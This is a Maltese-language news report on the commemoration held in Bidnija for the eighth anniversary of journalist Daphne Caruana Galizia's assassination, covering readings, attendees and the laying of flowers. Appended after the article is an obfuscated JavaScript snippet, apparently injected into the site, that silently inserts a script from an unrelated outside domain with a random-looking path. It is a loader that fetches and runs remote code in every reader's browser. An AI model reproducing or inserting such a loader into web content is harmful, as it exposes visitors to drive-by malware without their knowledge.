Matul il-jum tal-Ħamis 16 t’Ottubru, li mmarka t-tmien anniversjarju mill-assassinju tal-ġurnalista Daphne Caruana Galizia, numru ta’ attivisti, ġurnalisti, qraba u persuni li b’xi mod jew ieħor Daphne ħalliet impatt fuq ħajjithom, fakkru l-memorja tagħha u x-xogħol ġurnalistiku tagħha permezz ta’ ċerimonja fl-istess ħin u post fejn ġiet assassinata fil-Bidnija.
Matul din iċ-ċerimonja li ġiet organizzata mill-organizzazzjonijiet, Repubblika u Occupy Justice, inqraw siltiet minn poeżiji sinonimi mal-ġurnaliżmu kif ukoll artikli li kienet tippubblika fuq il-blog personali tagħha. Attendew ukoll membri mill-Istitut tal-Ġurnalisti Maltin u PEN Malta kif ukoll numru ta’ ambaxxaturi u kummissarji.
Preżenti għal din iċ-ċerimonja kien hemm is-Segretarju Ġenerali tal-Partit Nazzjonalista Charles Bonello u l-President tal-Eżekuttiv tal-Partit Nazzjonalista, Joseph Grech.
Kien hemm preżenti anke ambaxxaturi li ngħaqdu mal-familja Caruana Galizia.
Aktar tard, il-qraba u n-neputijiet ta’ Daphne Caruana Galizia poġġew fjuri f’din iċ-ċerimonja mill-aktar emozzjonanti.
;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, ‘script’, `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`); //= $special ?>

